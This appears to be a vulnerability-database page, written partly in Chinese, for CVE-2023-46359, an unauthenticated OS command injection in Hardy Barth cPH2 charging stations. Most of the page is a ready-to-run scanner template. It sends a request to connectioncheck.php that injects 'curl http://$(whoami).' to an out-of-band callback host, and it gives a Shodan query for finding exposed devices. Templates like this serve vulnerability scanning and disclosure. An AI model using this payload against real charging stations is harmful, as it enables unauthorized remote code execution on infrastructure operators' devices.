CVE-2023-46359: cPH2 Charging Station v1.87.0 - OS Command Injection

日期: 2025-08-01 | 影响软件: cPH2 Charging Station | POC: 已公开

漏洞描述

An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.

PoC代码[已公开]

id: CVE-2023-46359

info:
  name: cPH2 Charging Station v1.87.0 - OS Command Injection
  author: mlec
  severity: critical
  description: |
    An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.
  remediation: Fixed in version 2.0.0
  reference:
    - https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-46359
    - http://hardy.com
    - https://github.com/d4n-sec/d4n-sec.github.io
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-46359
    cwe-id: CWE-78
    epss-score: 0.93684
    epss-percentile: 0.99841
    cpe: cpe:2.3:h:hardy-barth:cph2_echarge:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: hardy-barth
    product: cph2_echarge
    shodan-query: html:"Salia PLCC"
  tags: cve2023,cve,salia-plcc,cph2,rce,hardy-barth

http:
  - method: GET
    path:
      - "{{BaseURL}}/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<b>SUCCESS</b>"
          - "127.0.0.1 && curl http://$(whoami).{{interactsh-url}}"
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a00473045022100c355d847cfc5c50fd778e3521b76c338b23094c073e82ff8951852460a04f31402202eaca45a5d548201ed86dcea50e74e196f47bfe8bba1ff698fe83f16642557d4:922c64590222798bb761d5b6d8e72950

相关漏洞推荐